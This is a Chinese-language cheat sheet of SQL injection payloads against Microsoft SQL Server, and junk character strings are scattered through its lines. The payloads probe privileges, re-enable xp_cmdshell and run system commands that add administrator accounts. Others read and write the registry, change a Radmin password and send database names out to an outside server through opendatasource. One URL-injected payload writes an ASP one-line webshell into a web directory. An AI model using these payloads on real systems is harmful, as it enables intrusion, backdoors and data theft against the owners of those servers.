常用的一些注入命令

admin

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
( {* ?- m9 s: J8 xAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
; f( `* K; N, L" S! y
//检测是否有读取某数据库的权限
& `' }. ]5 ~  [! \) x) x% Kand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
7 t% t, x' k" I: m# L2 P
% b6 N% ]1 _, H$ g0 @2 I2 i( d
. j5 d0 h- g& p0 j1 K3 h9 I4 ^5 g数字类型
4 m8 p- T( v! u. Q: a* B( f  j9 ?and char(124)%2Buser%2Bchar(124)=0
/ q7 t' o, V( p8 y
% L& [+ L* G! G  ^字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
  S3 }& M9 `, k0 D
3 _6 B8 O* j0 P0 B搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

- O% k# V( o3 r' ]爆用户名
and user>0
' and user>0 and ''='
6 U, o: S8 p4 H8 N" A2 Y
检测是否为SA权限
6 I% P7 s8 E3 K. Xand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
8 X7 w' _" F5 K! eAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
5 O7 M5 v7 B( U
: }8 x" m' U/ W( p* r/ m+ A8 w- B% m检测是不是MSSQL数据库
) A* u# u* r& Mand exists (select * from sysobjects);--
. c6 O- w6 o5 Q% r4 s
检测是否支持多行
) S  s- p0 z/ l& e- S. c;declare @d int;--
( j% l; p& O/ i3 z. ~( G
% C8 M6 }; l. ?# n8 m0 M2 c恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
- H3 ], l- b4 ^# g$ ?# G
+ R3 G5 j8 J- o2 W
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
% B' r' @/ b) C# L; f# ~- e
//-----------------------
# G; `) p! H4 p' @! d3 S% m) j//       执行命令
//-----------------------
首先开启沙盘模式：
7 I# }( S* s9 P8 K+ x" ]0 nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

, D6 W! H$ r0 [' s+ ~1 w1 x( W然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
/ w) x+ v7 m! e* n
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
. j# K9 M+ i" U# b
; W: i8 i/ c+ c0 F" B2 W. j) X2 rEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

9 d# B! {, g; U判断xp_cmdshell扩展存储过程是否存在：
1 m& M! z! N; Z: uhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
/ K- z' p& {) r" [. \
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
6 e6 i$ q$ W" ~; s
. k( ]7 n$ `( h4 cREG_SZ

# c* y8 ]' s+ j! O% ?0 m读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
* w" Z% B' _5 B+ w1 \% ?7 t4 x) P
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

, w% ~/ N/ R* \' n) s" _
数据库备份
, |( G3 q. e4 y" W5 Bbackup database pubs to disk = 'c:\123.bak'

//爆出长度
6 H. B( n/ I5 G! \; i  aAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
5 |1 q/ }6 l: s: W: z( T, B1 e0 y+ T


更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,9530772
4 c) ], @( s( S" H$ M( Oexec master.dbo.sp_addsrvrolemember test,sysadmin

- N- Y6 q+ {* ^% l2 e9 P删除扩展存储过过程xp_cmdshell的语句:
8 c& X. j2 C; W( \& Z6 u6 Eexec sp_dropextendedproc 'xp_cmdshell'
+ y3 ^! ~* k$ X9 T4 M
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
% s+ Q6 i) w& w% k" t9 k5 A" L9 f

8 n3 }& r) Q) ]2 P6 R' y停掉或激活某个服务。

- v% A) V/ J) rexec master..xp_servicecontrol 'stop','schedule'
6 o& z! P7 ?4 w3 B$ hexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

6 a+ U. l; ~( |  h. o! |, Y/ v只列某个目录下的子目录。
  s" y! Y2 e" ?9 Axp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
1 `0 X$ d+ R% Q( K2 l
dbo.xp_makecab
: z4 m; m. P. h) z4 ~) G'c:\test.cab','mszip',1,
: A8 j& ^" g* R. H8 t'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
* Z: x# g7 {; b$ v8 {( P  W
; M8 h' D& h7 V" n/ wxp_terminate_process
7 \) h  U8 Q/ u4 s' F) D6 o
' h# a' t9 ?# I, I, N1 u5 w6 ^: @停掉某个执行中的程序，但赋予的参数是 Process ID。
& w* k, b0 M6 H利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

( u+ ?) m7 ?  f7 x4 x. Cxp_terminate_process 2484

xp_unpackcab
' c/ f, Y/ r& \6 y8 O7 R
3 d3 x( m; i4 e% B# x! r5 r解开压缩档。
4 I- J$ ]; j& a' a% g3 G
. O9 I# B; I1 C0 Q9 L+ [xp_unpackcab 'c:\test.cab','c:\temp',1


: U# @  Q- g/ G' k" ]7 I) u某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

6 p$ N; _. u$ ^/ n1 Q- Lcreate database lcx;
Create TABLE ku(name nvarchar(256) null);
' U& K+ f* K3 ]* m4 l$ X' T8 \  \Create TABLE biao(id int NULL,name nvarchar(256) null);
9 k% D3 U1 u4 ~. s- j3 O: \7 b
, }% k4 K4 }0 Y9 K% y8 }/ W//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

1 Q  n0 ~2 W6 L: ~# w4 }
: B+ Q9 T5 w' Y1 [- ?+ {//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
. U& R1 B) u2 z. u
. u* J$ u$ e3 p1 B用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
: L% q) r8 C0 L5 }
//更新表内容
) Z! `  |# [6 ?8 m: `( I( ~% iUpdate films SET kind = 'Dramatic' Where id = 123

. [; @8 n" V8 s  D6 t//删除内容
delete from table_name where Stockid = 3